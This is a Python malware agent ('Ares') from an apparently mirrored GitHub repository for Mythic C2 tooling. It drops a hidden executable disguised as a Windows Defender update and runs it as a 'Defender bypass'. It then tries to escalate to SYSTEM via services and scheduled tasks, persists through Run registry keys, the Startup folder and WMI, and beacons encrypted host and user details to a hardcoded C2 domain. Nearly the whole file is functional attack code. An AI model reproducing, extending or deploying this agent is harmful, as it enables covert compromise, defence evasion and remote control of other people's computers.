mirror of
https://github.com/Aryma-f4/Ares-mythic.git
synced 2026-06-13 21:54:12 +00:00
This commit introduces the Apollo payload type for Mythic C2, including: - Complete .NET agent codebase with modular architecture - Multiple C2 profile implementations (HTTP, SMB, TCP, WebSocket) - Extensive documentation with command references and MITRE ATT&CK mappings - Agent utilities including UAC bypasses, injection techniques, and crypto modules - Configuration files for build systems and development environments - Sample binaries and resources for agent functionality The Apollo agent provides Windows post-exploitation capabilities with a focus on modularity and extensibility, supporting various communication methods and injection techniques.
418 lines
15 KiB
Python
418 lines
15 KiB
Python
#!/usr/bin/env python3
|
|
"""
|
|
Ares - Auto-Escalation and Persistence Agent
|
|
Automatically escalates privileges, establishes persistence, and connects to C2 server
|
|
"""
|
|
|
|
import asyncio
|
|
import base64
|
|
import json
|
|
import os
|
|
import subprocess
|
|
import sys
|
|
import tempfile
|
|
import shutil
|
|
import requests
|
|
import hmac
|
|
import hashlib
|
|
import random
|
|
import time
|
|
from Crypto.Cipher import AES
|
|
from Crypto.Util.Padding import pad, unpad
|
|
from pathlib import Path
|
|
from typing import Dict, Any, List, Optional
|
|
|
|
class AresAutoAgent:
|
|
def __init__(self):
|
|
# Configuration for gateofbabylon.space
|
|
self.c2_server = "http://gateofbabylon.space"
|
|
self.callback_port = 80
|
|
self.post_uri = "data"
|
|
|
|
# AES Encryption Keys from your configuration
|
|
self.aes_enc_key = base64.b64decode("MmAMVq39ihrqlzvU3yTEkuj4AatP9uBsTSAThGrdnnA=")
|
|
self.aes_dec_key = base64.b64decode("MmAMVq39ihrqlzvU3yTEkuj4AatP9uBsTSAThGrdnnA=")
|
|
|
|
# Headers
|
|
self.headers = {
|
|
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
|
|
}
|
|
|
|
# Agent settings
|
|
self.agent_id = self._generate_agent_id()
|
|
self.temp_dir = tempfile.gettempdir()
|
|
self.bluehammer_exe = "Ares.exe"
|
|
|
|
# Execution flags
|
|
self.privileges_escalated = False
|
|
self.persistence_established = False
|
|
self.connected_to_c2 = False
|
|
|
|
def _generate_agent_id(self):
|
|
"""Generate unique agent ID"""
|
|
return hashlib.sha256(os.urandom(16)).hexdigest()[:16]
|
|
|
|
def encrypt(self, data: bytes) -> bytes:
|
|
"""Encrypt data using AES-CBC"""
|
|
iv = os.urandom(16)
|
|
cipher = AES.new(self.aes_enc_key, AES.MODE_CBC, iv)
|
|
padded_data = pad(data, AES.block_size)
|
|
encrypted = cipher.encrypt(padded_data)
|
|
return iv + encrypted
|
|
|
|
def decrypt(self, encrypted_data: bytes) -> bytes:
|
|
"""Decrypt data using AES-CBC"""
|
|
iv = encrypted_data[:16]
|
|
cipher = AES.new(self.aes_dec_key, AES.MODE_CBC, iv)
|
|
decrypted = cipher.decrypt(encrypted_data[16:])
|
|
return unpad(decrypted, AES.block_size)
|
|
|
|
def generate_hmac(self, data: bytes) -> bytes:
|
|
"""Generate HMAC for message integrity"""
|
|
return hmac.new(self.aes_enc_key, data, hashlib.sha256).digest()
|
|
|
|
async def execute_command(self, command: str, args: Optional[List[str]] = None) -> Dict[str, Any]:
|
|
"""Execute system command"""
|
|
if args is None:
|
|
args = []
|
|
|
|
try:
|
|
result = subprocess.run([command] + args,
|
|
capture_output=True,
|
|
text=True,
|
|
timeout=30)
|
|
return {
|
|
"status": "success",
|
|
"stdout": result.stdout,
|
|
"stderr": result.stderr,
|
|
"returncode": result.returncode
|
|
}
|
|
except Exception as e:
|
|
return {"status": "error", "message": str(e)}
|
|
|
|
async def deploy_bluehammer(self) -> bool:
|
|
"""Deploy BlueHammer exploit to temp directory"""
|
|
try:
|
|
source_path = Path(self.bluehammer_exe)
|
|
if not source_path.exists():
|
|
print("[Ares] BlueHammer executable not found")
|
|
return False
|
|
|
|
target_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
|
|
shutil.copy2(source_path, target_path)
|
|
|
|
# Set hidden attribute
|
|
await self.execute_command("attrib", ["+h", str(target_path)])
|
|
|
|
return True
|
|
except Exception as e:
|
|
print(f"[Ares] Failed to deploy BlueHammer: {e}")
|
|
return False
|
|
|
|
async def bypass_defender(self) -> bool:
|
|
"""Execute BlueHammer to bypass Windows Defender"""
|
|
try:
|
|
print("[Ares] Deploying BlueHammer exploit...")
|
|
if not await self.deploy_bluehammer():
|
|
return False
|
|
|
|
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
|
|
print("[Ares] Executing BlueHammer...")
|
|
|
|
result = await self.execute_command(str(bluehammer_path))
|
|
|
|
if result.get("returncode") == 0:
|
|
print("[Ares] Windows Defender bypass successful!")
|
|
return True
|
|
else:
|
|
print(f"[Ares] BlueHammer execution failed: {result.get('stderr')}")
|
|
return False
|
|
|
|
except Exception as e:
|
|
print(f"[Ares] Defender bypass error: {e}")
|
|
return False
|
|
|
|
async def escalate_privileges(self) -> bool:
|
|
"""Automatically escalate to SYSTEM privileges"""
|
|
print("[Ares] Attempting privilege escalation...")
|
|
|
|
techniques = [
|
|
self._escalate_via_service,
|
|
self._escalate_via_scheduled_task,
|
|
self._escalate_via_token
|
|
]
|
|
|
|
for technique in techniques:
|
|
try:
|
|
success = await technique()
|
|
if success:
|
|
self.privileges_escalated = True
|
|
print("[Ares] Privilege escalation successful!")
|
|
return True
|
|
except Exception as e:
|
|
print(f"[Ares] Privilege escalation technique failed: {e}")
|
|
continue
|
|
|
|
print("[Ares] All privilege escalation techniques failed")
|
|
return False
|
|
|
|
async def _escalate_via_service(self) -> bool:
|
|
"""Escalate via service installation"""
|
|
try:
|
|
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
|
|
|
|
result = await self.execute_command("sc", [
|
|
"create", "WinDefendUpdate",
|
|
f"binPath={bluehammer_path}",
|
|
"start=", "auto",
|
|
"obj=", "LocalSystem"
|
|
])
|
|
|
|
if result.get("returncode") == 0:
|
|
# Start the service
|
|
start_result = await self.execute_command("sc", ["start", "WinDefendUpdate"])
|
|
return start_result.get("returncode") == 0
|
|
return False
|
|
|
|
except Exception:
|
|
return False
|
|
|
|
async def _escalate_via_scheduled_task(self) -> bool:
|
|
"""Escalate via scheduled task"""
|
|
try:
|
|
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
|
|
|
|
result = await self.execute_command("schtasks", [
|
|
"/create", "/tn", "WindowsDefenderMaintenance",
|
|
"/tr", str(bluehammer_path),
|
|
"/sc", "hourly", "/ru", "SYSTEM",
|
|
"/f" # Force creation
|
|
])
|
|
|
|
if result.get("returncode") == 0:
|
|
# Run task immediately
|
|
run_result = await self.execute_command("schtasks", [
|
|
"/run", "/tn", "WindowsDefenderMaintenance"
|
|
])
|
|
return run_result.get("returncode") == 0
|
|
return False
|
|
|
|
except Exception:
|
|
return False
|
|
|
|
async def _escalate_via_token(self) -> bool:
|
|
"""Escalate via token manipulation"""
|
|
try:
|
|
# Attempt token impersonation techniques
|
|
result = await self.execute_command("powershell", [
|
|
"-Command",
|
|
"try { $token = (Get-Process -Name lsass).Handle; Write-Output 'Token acquired' } catch { Write-Error 'Token failed' }"
|
|
])
|
|
return "Token acquired" in result.get("stdout", "")
|
|
except Exception:
|
|
return False
|
|
|
|
async def establish_persistence(self) -> bool:
|
|
"""Establish multiple persistence mechanisms"""
|
|
print("[Ares] Establishing persistence...")
|
|
|
|
techniques = [
|
|
self._persist_via_registry,
|
|
self._persist_via_startup,
|
|
self._persist_via_wmi
|
|
]
|
|
|
|
success_count = 0
|
|
|
|
for technique in techniques:
|
|
try:
|
|
success = await technique()
|
|
if success:
|
|
success_count += 1
|
|
print("[Ares] Persistence technique successful")
|
|
except Exception as e:
|
|
print(f"[Ares] Persistence technique failed: {e}")
|
|
continue
|
|
|
|
self.persistence_established = success_count > 0
|
|
print(f"[Ares] Established {success_count} persistence mechanisms")
|
|
return self.persistence_established
|
|
|
|
async def _persist_via_registry(self) -> bool:
|
|
"""Registry persistence"""
|
|
try:
|
|
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
|
|
|
|
# HKCU persistence
|
|
result1 = await self.execute_command("reg", [
|
|
"add", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
|
|
"/v", "WindowsDefenderUpdate",
|
|
"/t", "REG_SZ",
|
|
"/d", str(bluehammer_path),
|
|
"/f"
|
|
])
|
|
|
|
# HKLM persistence (requires admin)
|
|
result2 = await self.execute_command("reg", [
|
|
"add", "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
|
|
"/v", "WindowsDefenderUpdate",
|
|
"/t", "REG_SZ",
|
|
"/d", str(bluehammer_path),
|
|
"/f"
|
|
])
|
|
|
|
return result1.get("returncode") == 0 or result2.get("returncode") == 0
|
|
|
|
except Exception:
|
|
return False
|
|
|
|
async def _persist_via_startup(self) -> bool:
|
|
"""Startup folder persistence"""
|
|
try:
|
|
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
|
|
startup_path = Path(os.environ["APPDATA"]) / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup"
|
|
|
|
startup_path.mkdir(parents=True, exist_ok=True)
|
|
target_path = startup_path / "WindowsDefenderUpdate.exe"
|
|
|
|
shutil.copy2(bluehammer_path, target_path)
|
|
|
|
# Set hidden attribute
|
|
await self.execute_command("attrib", ["+h", str(target_path)])
|
|
|
|
return True
|
|
|
|
except Exception:
|
|
return False
|
|
|
|
async def _persist_via_wmi(self) -> bool:
|
|
"""WMI event subscription persistence"""
|
|
try:
|
|
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
|
|
|
|
# Create WMI event subscription
|
|
result = await self.execute_command("powershell", [
|
|
"-Command",
|
|
f"$filter = Register-WmiEvent -Class Win32_ProcessStartTrace -SourceIdentifier ProcessStart -Action {{ & '{bluehammer_path}' }}"
|
|
])
|
|
|
|
return result.get("returncode") == 0
|
|
except Exception:
|
|
return False
|
|
|
|
async def connect_to_c2(self) -> bool:
|
|
"""Connect to gateofbabylon.space C2 server"""
|
|
print("[Ares] Connecting to C2 server...")
|
|
|
|
try:
|
|
checkin_data = {
|
|
"action": "checkin",
|
|
"agent_id": self.agent_id,
|
|
"os": "windows",
|
|
"architecture": "x64",
|
|
"hostname": os.environ.get("COMPUTERNAME", "unknown"),
|
|
"username": os.environ.get("USERNAME", "unknown"),
|
|
"process_name": "win-update.exe",
|
|
"process_id": os.getpid(),
|
|
"status": "online",
|
|
"privileges": "SYSTEM" if self.privileges_escalated else "User",
|
|
"persistence": self.persistence_established
|
|
}
|
|
|
|
# Encrypt checkin data
|
|
encrypted_data = self.encrypt(json.dumps(checkin_data).encode())
|
|
hmac_value = self.generate_hmac(encrypted_data)
|
|
|
|
# Prepare payload
|
|
payload = {
|
|
"data": base64.b64encode(encrypted_data).decode(),
|
|
"hmac": base64.b64encode(hmac_value).decode()
|
|
}
|
|
|
|
# Send to C2 server
|
|
url = f"{self.c2_server}:{self.callback_port}/{self.post_uri}"
|
|
response = requests.post(
|
|
url,
|
|
json=payload,
|
|
headers=self.headers,
|
|
timeout=30
|
|
)
|
|
|
|
if response.status_code == 200:
|
|
self.connected_to_c2 = True
|
|
print("[Ares] Successfully connected to C2 server!")
|
|
return True
|
|
else:
|
|
print(f"[Ares] C2 connection failed: HTTP {response.status_code}")
|
|
return False
|
|
|
|
except Exception as e:
|
|
print(f"[Ares] C2 connection error: {e}")
|
|
return False
|
|
|
|
async def auto_execute(self):
|
|
"""Automatic execution sequence"""
|
|
print("=" * 60)
|
|
print("Ares Agent - Auto Execution Sequence")
|
|
print("=" * 60)
|
|
|
|
# Step 1: Bypass Windows Defender
|
|
print("\n[1/4] Bypassing Windows Defender...")
|
|
defender_bypassed = await self.bypass_defender()
|
|
|
|
if not defender_bypassed:
|
|
print("[Ares] Defender bypass failed, continuing anyway...")
|
|
|
|
# Step 2: Escalate privileges
|
|
print("\n[2/4] Escalating privileges...")
|
|
await self.escalate_privileges()
|
|
|
|
# Step 3: Establish persistence
|
|
print("\n[3/4] Establishing persistence...")
|
|
await self.establish_persistence()
|
|
|
|
# Step 4: Connect to C2
|
|
print("\n[4/4] Connecting to C2 server...")
|
|
c2_connected = await self.connect_to_c2()
|
|
|
|
# Summary
|
|
print("\n" + "=" * 60)
|
|
print("EXECUTION SUMMARY:")
|
|
print("=" * 60)
|
|
print(f"✓ Defender Bypass: {'SUCCESS' if defender_bypassed else 'FAILED'}")
|
|
print(f"✓ Privilege Escalation: {'SUCCESS' if self.privileges_escalated else 'FAILED'}")
|
|
print(f"✓ Persistence Established: {'SUCCESS' if self.persistence_established else 'FAILED'}")
|
|
print(f"✓ C2 Connection: {'SUCCESS' if c2_connected else 'FAILED'}")
|
|
print("=" * 60)
|
|
|
|
if c2_connected:
|
|
print("[Ares] Agent successfully deployed and connected to C2!")
|
|
print("[Ares] Listening for commands from gateofbabylon.space...")
|
|
|
|
# Main C2 loop
|
|
await self.c2_loop()
|
|
else:
|
|
print("[Ares] C2 connection failed, agent will exit")
|
|
|
|
async def c2_loop(self):
|
|
"""Main C2 communication loop"""
|
|
while True:
|
|
try:
|
|
# Check for commands from C2
|
|
await asyncio.sleep(30) # Check every 30 seconds
|
|
|
|
# Implement command processing here
|
|
# This would regularly check for tasks from the C2 server
|
|
|
|
except Exception as e:
|
|
print(f"[Ares] C2 loop error: {e}")
|
|
await asyncio.sleep(60) # Wait longer on error
|
|
|
|
async def main():
|
|
"""Main entry point - automatic execution"""
|
|
agent = AresAutoAgent()
|
|
await agent.auto_execute()
|
|
|
|
if __name__ == "__main__":
|
|
# Run the agent with automatic execution
|
|
asyncio.run(main()) |